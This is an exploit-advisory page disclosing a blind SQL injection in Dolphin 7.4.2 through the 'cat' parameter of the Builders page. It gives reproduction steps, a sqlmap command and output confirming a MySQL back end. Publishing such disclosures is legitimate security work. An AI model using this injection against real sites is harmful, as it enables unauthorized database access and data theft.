Dolphin 7.4.2 Blind SQL Injection

2024.08.08

Credit: Andrey Stoykov

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Blind SQL Injection - dolphinv7.4.2.
# Date: 8/2024
# Exploit Author: Andrey Stoykov
# Version: 7.4.2
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.html


SQL Injection:

Steps to Reproduce:

1. Navigate to "Builders" menu
2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar
3. That is the injection point

sqlmap -r request.txt --dbms=mysql -p cat

[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Dolphin 7.4.2 Blind SQL Injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Dolphin 7.4.2 Blind SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.